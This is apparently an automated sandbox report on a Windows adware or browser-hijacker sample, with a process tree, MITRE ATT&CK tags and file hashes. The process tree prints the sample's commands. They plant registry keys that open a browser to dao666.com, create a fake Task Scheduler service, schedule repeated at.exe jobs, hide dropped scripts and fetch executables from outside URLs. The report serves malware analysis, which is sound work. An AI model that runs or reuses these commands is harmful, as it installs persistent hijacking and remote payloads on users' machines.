      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://www.dao666.com/?in" /f
      4⤵
      Modifies registry class
      PID:2324
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder"
      4⤵
      Modifies registry class
      PID:1660
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "Attributes" /t REG_DWORD /d 0 /f
      4⤵
      Modifies registry class
      PID:2772
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideFolderVerbs" /t REG_SZ /d "" /f
      4⤵
      Modifies registry class
      PID:1664
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideOnDesktopPerUser" /t REG_SZ /d "" /f
      4⤵
      Modifies registry class
      PID:2488
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "WantsParsDisplayName" /t REG_SZ /d "" /f
      4⤵
      Modifies registry class
      PID:552
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoInternetIcon" /t REG_DWORD /d 1 /f
      4⤵
      PID:2848
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\runonce.cmd
    3⤵
    PID:2584
  - - C:\Windows\SysWOW64\sc.exe
      sc create Schedule binpath= "C:\Windows\svchost.exe -k netsvcs" depend= rpcss start= auto displayname= "Task Scheduler"
      4⤵
      Launches sc.exe
      PID:2824
  - - C:\Windows\SysWOW64\sc.exe
      sc config Schedule start= auto
      4⤵
      Launches sc.exe
      PID:2852
  - - C:\Windows\SysWOW64\net.exe
      net start "Task Scheduler"
      4⤵
      PID:2412
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start "Task Scheduler"
        5⤵
        
        PID:1280
  - - C:\Windows\SysWOW64\at.exe
      at 8:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:1320
  - - C:\Windows\SysWOW64\at.exe
      at 8:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:1200
  - - C:\Windows\SysWOW64\at.exe
      at 8:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:1496
  - - C:\Windows\SysWOW64\at.exe
      at 9:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:640
  - - C:\Windows\SysWOW64\at.exe
      at 9:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:2508
  - - C:\Windows\SysWOW64\at.exe
      at 9:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:3004
  - - C:\Windows\SysWOW64\at.exe
      at 10:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:2556
  - - C:\Windows\SysWOW64\at.exe
      at 10:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:540
  - - C:\Windows\SysWOW64\at.exe
      at 10:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:784
  - - C:\Windows\SysWOW64\at.exe
      at 11:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:1052
  - - C:\Windows\SysWOW64\at.exe
      at 11:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:1104
  - - C:\Windows\SysWOW64\at.exe
      at 11:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:2396
  - - C:\Windows\SysWOW64\at.exe
      at 12:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:844
  - - C:\Windows\SysWOW64\at.exe
      at 12:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:1804
  - - C:\Windows\SysWOW64\at.exe
      at 12:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:2564
  - - C:\Windows\SysWOW64\at.exe
      at 13:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:1172
  - - C:\Windows\SysWOW64\at.exe
      at 13:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:1088
  - - C:\Windows\SysWOW64\at.exe
      at 13:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:2540
  - - C:\Windows\SysWOW64\at.exe
      at 14:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:300
  - - C:\Windows\SysWOW64\at.exe
      at 14:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:1544
  - - C:\Windows\SysWOW64\at.exe
      at 14:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:1380
  - - C:\Windows\SysWOW64\at.exe
      at 15:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:1624
  - - C:\Windows\SysWOW64\at.exe
      at 15:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:2000
  - - C:\Windows\SysWOW64\at.exe
      at 15:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:1724
  - - C:\Windows\SysWOW64\at.exe
      at 16:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:908
  - - C:\Windows\SysWOW64\at.exe
      at 16:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:2280
  - - C:\Windows\SysWOW64\at.exe
      at 16:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:2100
  - - C:\Windows\SysWOW64\at.exe
      at 17:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:2520
  - - C:\Windows\SysWOW64\at.exe
      at 17:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:1740
  - - C:\Windows\SysWOW64\at.exe
      at 17:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:2424
  - - C:\Windows\SysWOW64\at.exe
      at 18:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:560
  - - C:\Windows\SysWOW64\at.exe
      at 18:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:2164
  - - C:\Windows\SysWOW64\at.exe
      at 18:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:880
  - - C:\Windows\SysWOW64\at.exe
      at 19:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:3028
  - - C:\Windows\SysWOW64\at.exe
      at 19:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:2036
  - - C:\Windows\SysWOW64\at.exe
      at 19:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:2560
  - - C:\Windows\SysWOW64\at.exe
      at 20:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:2168
  - - C:\Windows\SysWOW64\at.exe
      at 20:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:2192
  - - C:\Windows\SysWOW64\at.exe
      at 20:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:2444
  - - C:\Windows\SysWOW64\at.exe
      at 21:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:2484
  - - C:\Windows\SysWOW64\at.exe
      at 21:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:2748
  - - C:\Windows\SysWOW64\at.exe
      at 21:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:2388
  - - C:\Windows\SysWOW64\at.exe
      at 22:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:2756
  - - C:\Windows\SysWOW64\at.exe
      at 22:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:2988
  - - C:\Windows\SysWOW64\at.exe
      at 22:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:2724
  - - C:\Windows\SysWOW64\at.exe
      at 23:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:2760
  - - C:\Windows\SysWOW64\at.exe
      at 23:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
      4⤵
      PID:2144
  - - C:\Windows\SysWOW64\at.exe
      at 23:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
      4⤵
      PID:2244
  - - C:\Windows\SysWOW64\at.exe
      at 00:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"
      4⤵
      PID:1904
  - - C:\Windows\SysWOW64\at.exe
      at 00:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explore*.*"
      4⤵
      PID:2976
  - - C:\Windows\SysWOW64\at.exe
      at 00:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      PID:1676
  - - C:\Windows\SysWOW64\at.exe
      at 10:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
      4⤵
      PID:1192
  - - C:\Windows\SysWOW64\at.exe
      at 10:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"
      4⤵
      PID:1092
  - - C:\Windows\SysWOW64\at.exe
      at 10:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd
      4⤵
      PID:1308
  - - C:\Windows\SysWOW64\at.exe
      at 10:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
      4⤵
      PID:2172
  - - C:\Windows\SysWOW64\at.exe
      at 14:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
      4⤵
      PID:2572
  - - C:\Windows\SysWOW64\at.exe
      at 14:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»*.*"
      4⤵
      PID:2864
  - - C:\Windows\SysWOW64\at.exe
      at 14:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd
      4⤵
      PID:2732
  - - C:\Windows\SysWOW64\at.exe
      at 14:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
      4⤵
      PID:1956
  - - C:\Windows\SysWOW64\at.exe
      at 19:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
      4⤵
      PID:1920
  - - C:\Windows\SysWOW64\at.exe
      at 19:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»*.*"
      4⤵
      PID:760
  - - C:\Windows\SysWOW64\at.exe
      at 19:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd
      4⤵
      PID:320
  - - C:\Windows\SysWOW64\at.exe
      at 19:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
      4⤵
      PID:312
  - - C:\Windows\SysWOW64\at.exe
      at 21:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»*.*"
      4⤵
      PID:2104
  - - C:\Windows\SysWOW64\at.exe
      at 21:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»*.*"
      4⤵
      PID:2296
  - - C:\Windows\SysWOW64\at.exe
      at 21:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd
      4⤵
      PID:1984
  - - C:\Windows\SysWOW64\at.exe
      at 21:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»*.*"
      4⤵
      PID:1268
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\copy.cmd
    3⤵
    - Drops file in Program Files directory
    - Drops file in Windows directory
    PID:1940
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\WinWare\361.cmd"
      4⤵
      Sets file to hidden
      Drops file in Program Files directory
      Views/modifies file attributes
      PID:600
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\WinWare\fav\fav.cmd"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:2340
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\WinWare\tool.cmd"
      4⤵
      Sets file to hidden
      Drops file in Program Files directory
      Views/modifies file attributes
      PID:568
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\WinWare\360.cmd"
      4⤵
      Sets file to hidden
      Drops file in Program Files directory
      Views/modifies file attributes
      PID:1080
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\Windows\360SE.vbs"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:1804
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\Windows\36OSE.vbs"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:904
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\360.cmd
    3⤵
    - Drops file in Program Files directory
    PID:2564
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\cpa.cmd
    3⤵
    - Loads dropped DLL
    PID:2008
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\msn.exe
      ".\msn.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2888
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe" "http://download.youbak.com/msn/software/partner/36a.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1380
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe" "http://down.kuwo.cn/mbox/kwmusic_msnassistant.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1824

C:\Windows\system32\taskeng.exe
taskeng.exe {70A64590-DEE1-442F-8ED4-312041124CEB} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1516
- C:\Windows\system32\cmd.exe
  cmd.exe /c del C:\Users\Admin\╫└├µ\*Explorer*.*
  2⤵
  PID:840
- C:\Windows\system32\cmd.exe
  cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
  2⤵
  PID:2864

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
5009e33d81549d90b1770ad079acdba9

SHA1
5767eb8cd7266cc72d2f77b481338913ed6feb68

SHA256
a75ac55b1502de4ebd7ed27a5f1bad5e5a33bbb68c60b972899ce4308194eb6e

SHA512
3670c71cc6e3cbfe106795e26d974c7a012f33d50ff5706278e8f7eaaece9d1aace80caeff6f990115294afa364d6b1566b452fcdc82037fcd49bccd18315ef4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
7947e3dbf247f3781acfbd8b639ceacc

SHA1
bb20dd7547fbb098910c3ff39fee61efd8922c40

SHA256
d575b31312f7faee646fa5367a1a4970f1e9abd80f8b503d26feec2914fab3e4

SHA512
8a6f1d5a72b1f7f119ab0ba37203f9395e692f3e49b023845dcdbb98f8b564c519c836423baafdd3986a2b964aeaf5260688266561ce822d9ae832116a4eba77

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
5888b21282b886179c5715bfcfdc9bb8

SHA1
832f2d79920923c92b740c7abdc5e55bfdd67315

SHA256
92c5f8f5075b8a90d2183935472e41b644e491070907e3d08c52ae3d7ea35f81

SHA512
08ac81741981238d3992b6e604f40bbb8a8ebe7d6ff3e2d592e0db8e5bcf85e11a350b331a8846791b9dcf776089f31cf1130416ee4d6a35a0dad8051c9cb3b0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
c407ab16d9a03068102e9fa3f3c494c1

SHA1
f8e785ad0a511d0ab6bc4c337650fdaeb3c6c8b6

SHA256
9c97fd6b85bdfb022e56d00c5dae485a29eae31c8223b621cf6d5a94374dd543

SHA512
3009d2f9415c19b13e117110e9133b1180db8ce379c6d9f56cf2a584c8a3b7d4f6ba2313039bd3dcf62284d08b7554b4c9d1a80a844c4878b005a34cf4f73728

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
259d6bec45c67e0d0476869cd974dd6d

SHA1
17907a2541579bb249bce7e189cc32cbed96c43e

SHA256
10e74c1f9ed3056351cb4d6c70ed5e09e8df72f63887d75766324e3eba557e53

SHA512
e14c3d6ccdfb422473eea24cf20e856f43ed94bdf85f30d90f9ad629df119305b2c1f99056894621e8e81d834058f8d1e904532b6c2cd41173f0fd176da68ee7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
f89a4d568040d68ee56f310530ffa929

SHA1
7d6841c46a74fa55810d35e111fef129f1372b8d

SHA256
4eec44136e71e2bb8e30726ad6749bdc711b7e3a0d2675432fcc0b918e0b621f

SHA512
673978f58d8e43f1fbccadf59172d0500f2386d06cc635fbbd64a759908b061b9232abd67300a7b8a77be900d84f9f522bb7b2a7643a105075c3ca5b6dc35999

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
4cd68d1a21a9393f52ae805e5f942f6e

SHA1
a8603696e4985728298cf08cf6aadc8c68969f59

SHA256
77e8e668d93589435caae94a4bb8328298d2aaf8b6fa128f5eb3ac7744a04911

SHA512
f6015f3e83649a49f3989d5088680b00847bcd863dbb5b27535486a456e1848be1c79658efa6ccf7e2be0f4c7ea10a5104b61384bda9184680fb3d5fbef5cf0a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
b25b60f99690aaeae9c48dea1ef14982

SHA1
464ddfee8bb369b0d55124011c2e264bd9fc6a61

SHA256
7fcc010f7f151bc4ff1130d9a17cd47bdc881948808dd570a462dcdee0c8763e

SHA512
53763cb5d4367bc1d5115d3a2242dc00eab4e123449f9a66e37e9768f628fedfc7c262271bef13e6e8df7188283b2c9c205bf07cec404496351cd9ee68097ab8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
51ef4762f9d7851815086b2117c94f1c

SHA1
a2d8b2572a8f4c957995c3e4a6809e7e2d0cf883

SHA256
4102e7b0eb14872a64567af9eec8cdb5ec6d1a1407115bbe36637fed5be8d71a

SHA512
3ff46b358fb2f9eb94c51cd1351f9e96d6e91f44a5caf988c2d829563a4d0e7be5cb3857c14db5b881d3b7f8f1e3dcec39a3375441b083d5dfe832d076fc2511

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
37461bb7fdafd70f56ab1f09810894e0

SHA1
f385c56bb42ebdbca9ee769ff8dfacbee0e4c957

SHA256
1c9682de9f1e9e3e4767fd3554a979ad8e6e91e7ae0e241cfc39d43b4f06caf7

SHA512
49c16d124635d1e6d12971ec66461645d69835f933761b2a8625f0633f4d947d7b5a985968445a6170672a794a134d7fe40bcb7262409b702a08d22a97150f2d

Download Submit
